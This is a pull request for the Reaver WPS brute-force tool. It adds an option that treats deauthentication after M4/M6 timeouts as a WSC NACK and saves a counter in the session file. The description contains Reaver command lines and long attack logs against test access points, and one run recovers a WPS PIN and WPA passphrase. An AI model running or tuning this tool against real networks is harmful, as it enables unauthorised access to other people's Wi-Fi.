### PR TITLE
Treat the timeout as NACK if receive deauth request while waiting for M5/M7

### DIFF
--- a/src/argsparser.c
+++ b/src/argsparser.c
@@ -235,6 +235,7 @@ void init_default_settings(void)
 	pixie.do_pixie = 0;
 	set_pin_string_mode(0);
 	set_mac_changer(0);
+	set_deauth_is_nack_count(0);
 }
 
 /* Parses the recurring delay optarg */

--- a/src/defs.h
+++ b/src/defs.h
@@ -79,6 +79,8 @@
 #define EAPOL_START_MAX_TRIES	10
 #define WARN_FAILURE_COUNT	10
 
+#define MAX_DEAUTH_IS_NACK_COUNT	10
+
 #define EAPOL_START		1
 #define EAP_IDENTITY 		0x01
 #define EAP_EXPANDED            0xFE

--- a/src/globule.c
+++ b/src/globule.c
@@ -526,6 +526,15 @@ enum nack_code get_nack_reason()
 	return globule->nack_reason;
 }
 
+void set_deauth_is_nack_count(int value)
+{
+	globule->deauth_is_nack_count = value;
+}
+int get_deauth_is_nack_count()
+{
+	return globule->deauth_is_nack_count;
+}
+
 void set_handle(pcap_t *value)
 {
 	globule->handle = value;

--- a/src/globule.h
+++ b/src/globule.h
@@ -84,6 +84,8 @@ struct globals
 
         int timeout_is_nack;            /* Treat M5/M7 receive timeouts as NACKs (only needed for shoddy WPS implementations) */
 
+	int deauth_is_nack_count;       /* Tracks how many times M5/M7 receive timeouts with deauth request without NACK. -1: AP sends NACK */
+
         int m57_timeout;                /* Timeout period for receiving an M5/M7 response (uSeconds) */
 
         int out_of_time;                /* Set to 1 when sigalrm sounds */
@@ -252,6 +254,10 @@ void set_external_association(int value);
 int get_external_association(void);
 void set_nack_reason(enum nack_code value);
 enum nack_code get_nack_reason();
+
+void set_deauth_is_nack_count(int value);
+int get_deauth_is_nack_count();
+
 void set_handle(pcap_t *value);
 pcap_t *get_handle();
 void set_wps(struct wps_data *value);

--- a/src/session.c
+++ b/src/session.c
@@ -152,6 +152,11 @@ int restore_session()
 		}
 	}
 
+	/* Get the timeout with deauth request without NACKs count value */
+	if (fgets(line, MAX_LINE_SIZE, fp) != NULL) {
+		set_deauth_is_nack_count(atoi(line));
+	}
+
 	ret_val = 1;
 	
 fout:
@@ -197,7 +202,7 @@ int save_session()
 
 	/* Don't bother saving anything if nothing has been done */
 	/* Save .wpc file if the first half of first pin is correct */
-	if(!((get_p1_index() > 0) || (get_p2_index() > 0) || (get_key_status() >= KEY2_WIP))) {
+	if (!(get_p1_index() > 0 || get_p2_index() > 0 || get_key_status() >= KEY2_WIP || get_deauth_is_nack_count())) {
 		cprintf(VERBOSE, "[+] Nothing done, nothing to save.\n");
 		return 0;
 	}
@@ -240,6 +245,8 @@ int save_session()
 	/* Save all the p2 values */
 	for(i=0; i<P2_SIZE; i++) fprintf(fp, "%s\n", get_p2(i));
 
+	/* Save timeout with deauth request without NACKs count value */
+	fprintf(fp, "%d\n", get_deauth_is_nack_count());
 	fclose(fp);
 	return 1;
 }


### PR DESCRIPTION
I've already analyzed several situations with deauth request, it appears after `Sending identity response`, `Sending M2 message`, `Sending M4 message`, `Sending M6 message`, sometimes also receive `WSC NACK` after receive `deauth request`. Later I tested with routers with PIN already cracked and noticed that some routers are not sending WSC NACK instead of deauth request. With this knowledge I think it is possible to treat deauth request after Sending M4 message or Sending M6 message and got timeout as WSC NACK with new option -D to treat `deauth request` as `WSC NACK`

see an example with modified reaver with message count and PIN not cracked yet:
```
BSSID               Ch  dBm  WPS  Lck  Vendor    Progr  ESSID
--------------------------------------------------------------------------------
B8:5E:71:XX:XX:XX    1  -76  2.0  No   Broadcom   0.04  TestAP

Reaver v1.6.6-git-54-g2260cb4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Switching wlan0mon to channel 1
[+] Restored previous session
[+] Waiting for beacon from B8:5E:71:XX:XX:XX
[+] Received beacon from B8:5E:71:XX:XX:XX
[+] Vendor: Broadcom
[+] Trying DEFAULT PIN "62327145"
[+] Sending authentication request
[+] Sending association request
[+] Associated with B8:5E:71:XX:XX:XX (ESSID: TestAP)
[+] Sending EAPOL START request
[+] Received identity request (0)
[+] Sending identity response
[+] Received identity request (1)
[+] Sending identity response
[+] Received identity request (2)
[+] Sending identity response
[+] Received identity request (3)
[+] Sending identity response
[+] Received identity request (4)
[+] Sending identity response
[+] Received identity request (5)
[+] Sending identity response
[+] Received deauth request
[+] Received identity request (6)
[+] Sending identity response
[+] Received identity request (7)
[+] Sending identity response
[+] Received identity request (8)
[+] Sending identity response
[+] Received identity request (9)
[+] Sending identity response
[+] Received deauth request
[+] Received identity request (10)
[+] Sending identity response
[+] Received identity request (11)
[+] Sending identity response
[+] Received identity request (12)
[+] Sending identity response
[+] Received identity request (13)
[+] Sending identity response
[+] Received identity request (14)
[+] Sending identity response
[+] Received identity request (15)
[+] Sending identity response
[+] Received identity request (16)
[+] Sending identity response
[+] Received deauth request
[+] Received identity request (17)
[+] Sending identity response
[+] Received identity request (18)
[+] Sending identity response
[+] Received M1 message (0)
[+] Sending M2 message
[+] Received M1 message (1)
[+] Received M1 message (2)
[+] Received M1 message (3)
[+] Received M1 message (4)
[+] Received M1 message (5)
[+] Received M1 message (6)
[+] Received M1 message (7)
[+] Received M1 message (8)
[+] Received M1 message (9)
[+] Received M1 message (10)
[+] Received M1 message (11)
[+] Received M1 message (12)
[+] Received M1 message (13)
[+] Received M1 message (14)
[+] Received M1 message (15)
[+] Received M1 message (16)
[+] Received M1 message (17)
[+] Received M1 message (18)
[+] Received deauth request
[!] WARNING: Receive timeout occurred
[++] deauth_flag=1
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying DEFAULT PIN "62327145"
[+] Sending authentication request
[+] Sending association request
[+] Associated with B8:5E:71:XX:XX:XX (ESSID: TestAP)
[+] Sending EAPOL START request
[+] Received identity request (0)
[+] Sending identity response
[+] Received deauth request
[+] Received identity request (1)
[+] Sending identity response
[+] Received identity request (2)
[+] Sending identity response
[+] Received identity request (3)
[+] Sending identity response
[+] Received identity request (4)
[+] Sending identity response
[+] Received deauth request
[+] Received identity request (5)
[+] Sending identity response
[+] Received identity request (6)
[+] Sending identity response
[+] Received identity request (7)
[+] Sending identity response
[+] Received deauth request
[+] Received identity request (8)
[+] Sending identity response
[+] Received identity request (9)
[+] Sending identity response
[+] Received identity request (10)
[+] Sending identity response
[+] Received identity request (11)
[+] Sending identity response
[+] Received identity request (12)
[+] Sending identity response
[+] Received deauth request
[+] Received identity request (13)
[+] Sending identity response
[+] Received identity request (14)
[+] Sending identity response
[+] Received deauth request
[+] Received identity request (15)
[+] Sending identity response
[+] Received identity request (16)
[+] Sending identity response
[+] Received identity request (17)
[+] Sending identity response
[+] Received identity request (18)
[+] Sending identity response
[+] Received identity request (19)
[+] Sending identity response
[+] Received identity request (20)
[+] Sending identity response
[+] Received M1 message (0)
[+] Sending M2 message
[+] Received M1 message (1)
[+] Received M1 message (2)
[+] Received M1 message (3)
[+] Received M1 message (4)
[+] Received M1 message (5)
[+] Received M1 message (6)
[+] Received M1 message (7)
[+] Received M1 message (8)
[+] Received M1 message (9)
[+] Received M1 message (10)
[+] Received M1 message (11)
[+] Received M1 message (12)
[+] Received deauth request
[+] Received M1 message (13)
[+] Received M1 message (14)
[+] Received M1 message (15)
[+] Received deauth request
[+] Received M1 message (16)
[+] Received M1 message (17)
[+] Received M3 message (0)
[+] Sending M4 message
[+] Received M3 message (1)
[+] Received M3 message (2)
[+] Received M3 message (3)
[+] Received M3 message (4)
[+] Received M3 message (5)
[+] Received M3 message (6)
[+] Received deauth request
[!] WARNING: Receive timeout occurred
[++] deauth_flag=48
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying DEFAULT PIN "62327145"
[+] Sending authentication request
[+] Sending association request
[+] Associated with B8:5E:71:XX:XX:XX (ESSID: TestAP)
[+] Sending EAPOL START request
[+] Received identity request (0)
[+] Sending identity response
[+] Received identity request (1)
[+] Sending identity response
[+] Received identity request (2)
[+] Sending identity response
[+] Received deauth request
[+] Received identity request (3)
[+] Sending identity response
[+] Received identity request (4)
[+] Sending identity response
[+] Received deauth request
[!] WARNING: Receive timeout occurred
[++] deauth_flag=1
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying DEFAULT PIN "62327145"
[+] Sending authentication request
[+] Sending association request
[+] Associated with B8:5E:71:XX:XX:XX (ESSID: TestAP)
[+] Sending EAPOL START request
[+] Received identity request (0)
[+] Sending identity response
[+] Received identity request (1)
[+] Sending identity response
[+] Received identity request (2)
[+] Sending identity response
[+] Received identity request (3)
[+] Sending identity response
[+] Received deauth request
[+] Received identity request (4)
[+] Sending identity response
[+] Received identity request (5)
[+] Sending identity response
[+] Received identity request (6)
[+] Sending identity response
[+] Received identity request (7)
[+] Sending identity response
[+] Received identity request (8)
[+] Sending identity response
[+] Received deauth request
[+] Received identity request (9)
[+] Sending identity response
[+] Received identity request (10)
[+] Sending identity response
[+] Received deauth request
[+] Received identity request (11)
[+] Sending identity response
[+] Received identity request (12)
[+] Sending identity response
[+] Received identity request (13)
[+] Sending identity response
[+] Received identity request (14)
[+] Sending identity response
[+] Received identity request (15)
[+] Sending identity response
[+] Received deauth request
[+] Received identity request (16)
[+] Sending identity response
[+] Received identity request (17)
[+] Sending identity response
[+] Received deauth request
[+] Received identity request (18)
[+] Sending identity response
[+] Received identity request (19)
[+] Sending identity response
[+] Received identity request (20)
[+] Sending identity response
[+] Received identity request (21)
[+] Sending identity response
[+] Received identity request (22)
[+] Sending identity response
[+] Received M1 message (0)
[+] Sending M2 message
[+] Received M1 message (1)
[+] Received M1 message (2)
[+] Received M1 message (3)
[+] Received M1 message (4)
[+] Received M1 message (5)
[+] Received M1 message (6)
[+] Received M1 message (7)
[+] Received M1 message (8)
[+] Received M1 message (9)
[+] Received M1 message (10)
[+] Received M1 message (11)
[+] Received M1 message (12)
[+] Received M1 message (13)
[+] Received M1 message (14)
[+] Received deauth request
[+] Received M1 message (15)
[+] Received M1 message (16)
[+] Received M1 message (17)
[+] Received M1 message (18)
[+] Received M1 message (19)
[+] Received M3 message (0)
[+] Sending M4 message
[+] Received M3 message (1)
[+] Received M3 message (2)
[+] Received deauth request
[+] Received WSC NACK (reason: 0x0012) (deauth_flag=6)
[+] Sending WSC NACK
[+] Trying DEFAULT PIN "10864111"
[+] Sending authentication request
[+] Sending association request
[+] Associated with B8:5E:71:XX:XX:XX (ESSID: TestAP)
[+] Sending EAPOL START request
[+] Received identity request (0)
[+] Sending identity response
......
```
Example with half PIN:
```
root@kali:~# reaver -i wlan0mon -b 8C:44:4F:XX:XX:XX -c 1 -vv -N -p 7429 -t 35

Reaver v1.6.6-git-54-g2260cb4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Switching wlan0mon to channel 1
[?] Restore previous session for 8C:44:4F:XX:XX:XX? [n/Y] n
[+] Waiting for beacon from 8C:44:4F:XX:XX:XX
[+] Received beacon from 8C:44:4F:XX:XX:XX
[+] Vendor: Broadcom
[+] Trying pin "74295678"
[+] Sending authentication request
[+] Sending association request
[+] Associated with 8C:44:4F:XX:XX:XX (ESSID: TestAP 2.4 G)
[+] Sending EAPOL START request
[+] Received identity request (0)
[+] Sending identity response
[+] Received identity request (1)
[+] Sending identity response
[+] Received identity request (2)
[+] Sending identity response
[+] Received identity request (3)
[+] Sending identity response
[+] Received identity request (4)
[+] Sending identity response
[+] Received identity request (5)
[+] Sending identity response
[+] Received M1 message (0)
[+] Sending M2 message
[+] Received M1 message (1)
[+] Received M1 message (2)
[+] Received M1 message (3)
[+] Received M1 message (4)
[+] Received M1 message (5)
[+] Received M1 message (6)
[+] Received M1 message (7)
[+] Received M1 message (8)
[+] Received M1 message (9)
[+] Received M1 message (10)
[+] Received M1 message (11)
[+] Received M1 message (12)
[+] Received M1 message (13)
[+] Received M1 message (14)
[+] Received M1 message (15)
[+] Received M1 message (16)
[+] Received M1 message (17)
[+] Received M1 message (18)
[+] Received M1 message (19)
[+] Received M1 message (20)
[+] Received M1 message (21)
[+] Received M1 message (22)
[+] Received M1 message (23)
[+] Received M1 message (24)
[+] Received M1 message (25)
[+] Received M1 message (26)
[+] Received M1 message (27)
[+] Received M1 message (28)
[+] Received M1 message (29)
[+] Received M1 message (30)
[+] Received M1 message (31)
[+] Received M1 message (32)
[+] Received M1 message (33)
[+] Received M1 message (34)
[+] Received M1 message (35)
[+] Received M1 message (36)
[+] Received M1 message (37)
[+] Received M1 message (38)
[+] Received M1 message (39)
[+] Received M1 message (40)
[+] Received M1 message (41)
[+] Received M3 message (0)
[+] Sending M4 message
[+] Received M3 message (1)
[+] Received M3 message (2)
[+] Received M3 message (3)
[+] Received M3 message (4)
[+] Received M3 message (5)
[+] Received M5 message (0)
[+] Sending M6 message
[+] Received M5 message (1)
[+] Received M5 message (2)
[+] Received M5 message (3)
[+] Received deauth request
[!] WARNING: Receive timeout occurred
[++] deauth_flag=111
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin "74295678"
[+] Sending authentication request
[+] Sending association request
[+] Associated with 8C:44:4F:XX:XX:XX (ESSID: TestAP 2.4 G)
[+] Sending EAPOL START request
[+] Received identity request (0)
[+] Sending identity response
[+] Received identity request (1)
[+] Sending identity response
[+] Received identity request (2)
[+] Sending identity response
[+] Received identity request (3)
[+] Sending identity response
[+] Received identity request (4)
[+] Sending identity response
[+] Received M1 message (0)
[+] Sending M2 message
[+] Received M1 message (1)
[+] Received M1 message (2)
[+] Received M1 message (3)
[+] Received M1 message (4)
[+] Received M1 message (5)
[+] Received M1 message (6)
[+] Received M1 message (7)
[+] Received M1 message (8)
[+] Received M1 message (9)
[+] Received M1 message (10)
[+] Received M1 message (11)
[+] Received M1 message (12)
[+] Received M1 message (13)
[+] Received M1 message (14)
[+] Received M1 message (15)
[+] Received M1 message (16)
[+] Received M1 message (17)
[+] Received M1 message (18)
[+] Received M1 message (19)
[+] Received M1 message (20)
[+] Received M1 message (21)
[+] Received M1 message (22)
[+] Received M1 message (23)
[+] Received M1 message (24)
[+] Received M1 message (25)
[+] Received M1 message (26)
[+] Received M3 message (0)
[+] Sending M4 message
[+] Received M3 message (1)
[+] Received M3 message (2)
[+] Received M3 message (3)
[+] Received M3 message (4)
[+] Received M3 message (5)
[+] Received M5 message (0)
[+] Sending M6 message
[+] Received M5 message (1)
[+] Received M5 message (2)
[+] Received M5 message (3)
[+] Received deauth request
[!] WARNING: Receive timeout occurred
[++] deauth_flag=106
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
^C
[+] Session saved.
```

Example with full PIN:
```
root@kali:~# reaver -i wlan0mon -b 8C:44:4F:XX:XX:XX -c 1 -vv -N -p 7429548 -t 35

Reaver v1.6.6-git-54-g2260cb4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Switching wlan0mon to channel 1
[?] Restore previous session for 8C:44:4F:XX:XX:XX? [n/Y]
[+] Restored previous session
[+] Waiting for beacon from 8C:44:4F:XX:XX:XX
[+] Received beacon from 8C:44:4F:XX:XX:XX
[+] Vendor: Broadcom
[+] Trying pin "74295487"
[+] Sending authentication request
[+] Sending association request
[!] WARNING: Receive timeout occurred
[+] Sending authentication request
[+] Sending association request
[+] Associated with 8C:44:4F:XX:XX:XX (ESSID: TestAP 2.4 G)
[+] Sending EAPOL START request
[+] Received identity request (0)
[+] Sending identity response
[+] Received identity request (1)
[+] Sending identity response
[+] Received identity request (2)
[+] Sending identity response
[+] Received identity request (3)
[+] Sending identity response
[+] Received M1 message (0)
[+] Sending M2 message
[+] Received M1 message (1)
[+] Received M1 message (2)
[+] Received M1 message (3)
[+] Received M1 message (4)
[+] Received M1 message (5)
[+] Received M1 message (6)
[+] Received M1 message (7)
[+] Received M1 message (8)
[+] Received M1 message (9)
[+] Received M1 message (10)
[+] Received M1 message (11)
[+] Received M1 message (12)
[+] Received M1 message (13)
[+] Received M1 message (14)
[+] Received M1 message (15)
[+] Received M1 message (16)
[+] Received M1 message (17)
[+] Received M1 message (18)
[+] Received M1 message (19)
[+] Received M1 message (20)
[+] Received M1 message (21)
[+] Received M1 message (22)
[+] Received M1 message (23)
[+] Received M3 message (0)
[+] Sending M4 message
[+] Received M3 message (1)
[+] Received M3 message (2)
[+] Received M3 message (3)
[+] Received M3 message (4)
[+] Received M5 message (0)
[+] Sending M6 message
[+] Received M5 message (1)
[+] Received M5 message (2)
[+] Received M5 message (3)
[+] Received M5 message (4)
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 55 seconds
[+] WPS PIN: '74295487'
[+] WPA PSK: 'password'
[+] AP SSID: 'TestAP 2.4 G'
```

see an example without PIN:
```
root@kali:~# reaver -i wlan2mon -b 8C:44:4F:XX:XX:XX -c 1 -vv -N -t 35          

Reaver v1.6.6-git-54-g2260cb4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Switching wlan2mon to channel 1
[?] Restore previous session for 8C:44:4F:XX:XX:XX? [n/Y] n
[+] Waiting for beacon from 8C:44:4F:XX:XX:XX
[+] Received beacon from 8C:44:4F:XX:XX:XX
[+] Vendor: Broadcom
[+] Trying pin "12345670"
[+] Sending authentication request
[+] Sending association request
[+] Associated with 8C:44:4F:XX:XX:XX (ESSID: TestAP 2.4 G)
[+] Sending EAPOL START request
[+] Received identity request (0)
[+] Sending identity response
[+] Received M1 message (0)
[+] Sending M2 message
[+] Received M1 message (1)
[+] Received M1 message (2)
[+] Received M1 message (3)
[+] Received M1 message (4)
[+] Received M1 message (5)
[+] Received M3 message (0)
[+] Sending M4 message
[+] Received deauth request
[!] WARNING: Receive timeout occurred
[++] deauth_flag=205
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
^C
[+] Nothing done, nothing to save.
```
